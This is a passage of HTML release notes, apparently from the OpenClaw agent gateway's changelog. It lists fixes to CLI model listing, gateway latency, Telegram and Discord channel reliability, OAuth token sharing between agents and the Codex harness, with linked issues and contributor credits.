<li>Agents/errors: suppress malformed streaming tool-call JSON fragments before they reach chat surfaces while preserving provider request-validation diagnostics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187420949" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59076" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59076/hovercard" href="https://github.com/openclaw/openclaw/issues/59076">#59076</a>; keeps <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187447924" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59080" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59080/hovercard" href="https://github.com/openclaw/openclaw/issues/59080">#59080</a> as duplicate coverage. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187915161" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59118" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59118/hovercard" href="https://github.com/openclaw/openclaw/pull/59118">#59118</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/singleGanghood/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/singleGanghood">@singleGanghood</a>.</li>
<li>CLI/models: restore provider-filtered <code>models list --all --provider &lt;id&gt;</code> rows for providers without manifest/static catalog coverage, including Anthropic and Amazon Bedrock, while keeping the compatibility fallback off expensive availability and resolver paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: keep manifest auth-evidence credentials visible across <code>models status</code>, auth probes, and PI model discovery so workspace-scoped provider auth does not disagree between listing, probing, and execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: move local credential evidence such as Google Vertex ADC into generic plugin manifest setup metadata so the model-list auth index stays declarative without provider-specific runtime branches. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: compute the <code>models list</code> Auth column through one command-local provider auth index so row rendering no longer repeats auth profile, env, configured-provider, AWS, or synthetic-auth checks per model row. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: move the OpenAI listable catalog into the plugin manifest so <code>models list --all --provider openai</code> uses the manifest fast path instead of loading provider runtime normalization hooks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/tools: keep the Gateway <code>tools.*</code> RPC namespace out of plugin command discovery and managed proxy startup, so stray commands like <code>openclaw tools effective</code> fail quickly instead of cold-loading plugin metadata. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342227669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73477/hovercard" href="https://github.com/openclaw/openclaw/issues/73477">#73477</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a>.</li>
<li>CLI/status: keep default text <code>openclaw status --usage</code> on metadata-only channel scans unless <code>--deep</code> or <code>--all</code> is set, and send stray <code>openclaw tools --help</code> through the precomputed root-help fast path so latency-triage commands avoid plugin/runtime cold loads before printing. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342227669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73477/hovercard" href="https://github.com/openclaw/openclaw/issues/73477">#73477</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349031630" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74220" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74220/hovercard" href="https://github.com/openclaw/openclaw/pull/74220">#74220</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Agents/diagnostics: trace embedded-run startup and preparation stage timings before model I/O, and warn only on severe slow stages, so Docker/VPS latency reports can identify whether plugin loading, auth/model resolution, tool inventory, bootstrap, MCP/LSP, resource loading, or stream setup is dominating pre-run latency without noisy normal logs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341750455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73428" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73428/hovercard" href="https://github.com/openclaw/openclaw/issues/73428">#73428</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dimaoggg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dimaoggg">@Dimaoggg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quangtran88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quangtran88">@quangtran88</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Heyvhuang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Heyvhuang">@Heyvhuang</a>.</li>
<li>Agents/subagents: cache persisted subagent run registry reads by file signature while preserving fresh-parse isolation, so busy gateways stop reparsing unchanged <code>subagents/runs.json</code> on controller/list/status hot paths. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/argus-as/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/argus-as">@argus-as</a>.</li>
<li>Gateway/clients: wait for the event loop to become responsive before opening Gateway WebSocket RPC/probe/client connections while charging that readiness wait to caller timeouts, so Windows deferred module-evaluation stalls no longer turn healthy loopback gateways into false handshake timeouts across status, TUI, ACP, MCP, node-host, and plugin client paths. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349780099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74279" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74279/hovercard" href="https://github.com/openclaw/openclaw/issues/74279">#74279</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4082797740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48270" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48270/hovercard" href="https://github.com/openclaw/openclaw/pull/48270">#48270</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wongcode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wongcode">@wongcode</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joost-heijden/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joost-heijden">@joost-heijden</a>.</li>
<li>Gateway/Windows: read listener command lines via PowerShell before falling back to <code>wmic</code>, so restart health can recognize OpenClaw listeners on modern Windows installs and avoid long anonymous-port waits. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349819170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74280" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74280/hovercard" href="https://github.com/openclaw/openclaw/issues/74280">#74280</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zym951223/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zym951223">@zym951223</a>.</li>
<li>Plugins/runtime-deps: record process start-time in bundled dependency install locks and expire recycled-PID locks, so Docker gateway restarts recover from stale <code>.openclaw-runtime-deps.lock</code> directories without waiting through repeated five-minute timeouts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350782800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74346" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74346/hovercard" href="https://github.com/openclaw/openclaw/issues/74346">#74346</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350992165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74361" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74361/hovercard" href="https://github.com/openclaw/openclaw/pull/74361">#74361</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhsmith409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhsmith409">@jhsmith409</a>.</li>
<li>Plugins/runtime-deps: memoize packaged bundled runtime dist-mirror preparation after the first successful pass while keeping source-checkout mirrors refreshable, so constrained Docker/VPS installs avoid repeated root scans before chat turns. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341750455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73428" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73428/hovercard" href="https://github.com/openclaw/openclaw/issues/73428">#73428</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341661895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73421" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73421/hovercard" href="https://github.com/openclaw/openclaw/issues/73421">#73421</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342776048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73532" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73532/hovercard" href="https://github.com/openclaw/openclaw/issues/73532">#73532</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342227669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73477/hovercard" href="https://github.com/openclaw/openclaw/issues/73477">#73477</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dimaoggg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dimaoggg">@Dimaoggg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oromeis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oromeis">@oromeis</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oadiazp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oadiazp">@oadiazp</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmfraga/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmfraga">@jmfraga</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bstanbury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bstanbury">@bstanbury</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/antoniusfelix/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/antoniusfelix">@antoniusfelix</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jkobject/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jkobject">@jkobject</a>.</li>
<li>Channels/Discord: treat bare numeric outbound targets that match the effective Discord DM allowlist as user DMs while preserving account-specific legacy <code>dm.allowFrom</code> precedence over inherited root <code>allowFrom</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350101821" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74303" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74303/hovercard" href="https://github.com/openclaw/openclaw/pull/74303">#74303</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</li>
<li>Channels/Discord/Slack: share one DM policy/allowlist resolver across runtime, setup, allowlist editing, and doctor repair, so legacy <code>dm.policy</code> / <code>dm.allowFrom</code> compatibility migrates to canonical <code>dmPolicy</code> / <code>allowFrom</code> without divergent access checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</li>
<li>Control UI: make the chat sidebar split divider focusable, keyboard-resizable, ARIA-described, and pointer-event based so sidebar resizing works without a mouse. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Agents/usage: keep PI embedded-run telemetry attributed to the resolved model provider instead of the PI harness label, so OpenRouter and other provider-backed turns report the right provider in session usage and traces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/attribution: send OpenClaw attribution headers on native OpenAI and Codex traffic, including SDK transports, realtime voice and TTS, device-code auth, WHAM usage, and remote embeddings, so PI-origin defaults no longer leak into provider requests. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/auth: keep OAuth auth profiles inherited from the main agent read-through instead of copying refresh tokens into secondary agents, and refresh Codex app-server tokens against the owning store so multi-agent swarms avoid reused refresh-token failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347764512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74055" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74055/hovercard" href="https://github.com/openclaw/openclaw/issues/74055">#74055</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ClarityInvest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ClarityInvest">@ClarityInvest</a>.</li>
<li>Channels/Telegram: honor <code>ALL_PROXY</code> / <code>all_proxy</code> and service-level <code>OPENCLAW_PROXY_URL</code> when constructing the HTTP/1-only Telegram Bot API transport, so Windows and service installs that rely on those proxy settings no longer fall back to direct egress. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347549013" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74014/hovercard" href="https://github.com/openclaw/openclaw/issues/74014">#74014</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348024807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74086" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74086/hovercard" href="https://github.com/openclaw/openclaw/issues/74086">#74086</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Channels/Telegram: keep raw host/network-unreachable Bot API connect failures non-fatal and route tagged polling uncaught exceptions through the Telegram restart path, so transient reachability failures no longer kill the Gateway or leave long polling stuck. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4202091022" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60515" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60515/hovercard" href="https://github.com/openclaw/openclaw/issues/60515">#60515</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352759456" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74540" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74540/hovercard" href="https://github.com/openclaw/openclaw/issues/74540">#74540</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thacid22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thacid22">@thacid22</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ewimsatt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ewimsatt">@ewimsatt</a>.</li>
<li>Channels/Telegram: continue polling when <code>deleteWebhook</code> hits a transient network failure but <code>getWebhookInfo</code> confirms no webhook is configured, so startup does not retry cleanup forever after the webhook was already removed. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348024807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74086" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74086/hovercard" href="https://github.com/openclaw/openclaw/issues/74086">#74086</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4078467786" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47384" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47384/hovercard" href="https://github.com/openclaw/openclaw/pull/47384">#47384</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/clovericbot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/clovericbot">@clovericbot</a>.</li>
<li>Channels/Telegram: retry native quote replies without <code>reply_parameters.quote</code> when Telegram returns <code>QUOTE_TEXT_INVALID</code>, so stale or truncated quote excerpts no longer drop the whole reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353246635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74581" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74581/hovercard" href="https://github.com/openclaw/openclaw/issues/74581">#74581</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moeedahmed/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moeedahmed">@moeedahmed</a>.</li>
<li>Channels/Telegram: apply strict safe-send retry to inbound final replies when grammY wraps a pre-connect failure, while leaving ambiguous plain network envelopes single-shot to avoid duplicate visible messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348834237" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74203" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74203/hovercard" href="https://github.com/openclaw/openclaw/issues/74203">#74203</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nanli2000cn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nanli2000cn">@nanli2000cn</a>.</li>
<li>Channels/Telegram: surface polling liveness warnings in channel status and doctor when a running long-poller has not completed <code>getUpdates</code> after startup grace or its transport activity is stale, so silent polling failures no longer look clean. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74299" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74299/hovercard" href="https://github.com/openclaw/openclaw/issues/74299">#74299</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a>.</li>
<li>Channels/Telegram: publish webhook runtime state and warn when <code>setWebhook</code> has not completed after startup grace, so webhook-mode accounts no longer look healthy while registration is still failing or retrying. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080484" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74299" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74299/hovercard" href="https://github.com/openclaw/openclaw/issues/74299">#74299</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Channels/Telegram: bound native command menu <code>deleteMyCommands</code> and <code>setMyCommands</code> Bot API calls and allow the same timeout-triggered transport fallback retry as other startup control calls, so Windows/WSL network stalls cannot leave command sync hanging behind an otherwise running provider. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348024807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74086" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74086/hovercard" href="https://github.com/openclaw/openclaw/issues/74086">#74086</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>ACP/commands: accept forwarded ACP timeout config controls in the OpenClaw bridge, treat unsupported discard-close controls as recoverable cleanup, and restore native <code>/verbose full</code> plus no-arg status behavior, so Discord command menus and nested ACP turns no longer fail on supported session controls. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex harness: interrupt and release native app-server turns that go quiet after an OpenClaw dynamic-tool response without sending <code>turn/completed</code>, so Discord and other chat lanes do not stay stuck in <code>processing</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Codex harness: bound OpenClaw dynamic tool responses to 30 seconds and fail closed with an explicit tool result when the app-server bridge would otherwise strand the turn in <code>processing</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>TUI/status: clear stale <code>streaming</code> footer state when a final event arrives after the active run was already cleared and no tracked runs remain, while preserving concurrent-run ownership and inactive local <code>/btw</code> terminal handling. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244725441" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64825" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64825/hovercard" href="https://github.com/openclaw/openclaw/issues/64825">#64825</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244930419" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64842" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64842/hovercard" href="https://github.com/openclaw/openclaw/pull/64842">#64842</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244936758" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64843" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64843/hovercard" href="https://github.com/openclaw/openclaw/pull/64843">#64843</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244944537" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64847" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64847/hovercard" href="https://github.com/openclaw/openclaw/pull/64847">#64847</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244992206" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64862" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64862/hovercard" href="https://github.com/openclaw/openclaw/pull/64862">#64862</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/briandevans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/briandevans">@briandevans</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Yanhu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Yanhu007">@Yanhu007</a>.</li>
<li>Channels/Discord: fail startup closed when Discord cannot resolve the bot's own identity and keep mention gating active when only configured mention patterns can detect mentions, so the provider no longer continues with a missing bot id. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4052146259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42219" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42219/hovercard" href="https://github.com/openclaw/openclaw/issues/42219">#42219</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077562944" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46856" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46856/hovercard" href="https://github.com/openclaw/openclaw/pull/46856">#46856</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4090797830" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49218" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/49218/hovercard" href="https://github.com/openclaw/openclaw/pull/49218">#49218</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/education-01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/education-01">@education-01</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BenediktSchackenberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BenediktSchackenberg">@BenediktSchackenberg</a>.</li>
<li>Channels/Discord: split long CJK replies at punctuation and code-point-safe fallback boundaries so Discord chunking stays readable without corrupting astral characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4037445222" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38597" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38597/hovercard" href="https://github.com/openclaw/openclaw/issues/38597">#38597</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326906134" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71384" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71384/hovercard" href="https://github.com/openclaw/openclaw/pull/71384">#71384</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>.</li>
<li>TUI: keep the streaming watchdog alive across active tool/lifecycle proof-of-life, pause it during disconnects, and reload history after stale reconnect runs so long-running chats stop flipping to false idle or hanging on stale streaming. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291861236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69081" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69081/hovercard" href="https://github.com/openclaw/openclaw/issues/69081">#69081</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EenvoudJasper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EenvoudJasper">@EenvoudJasper</a>.</li>
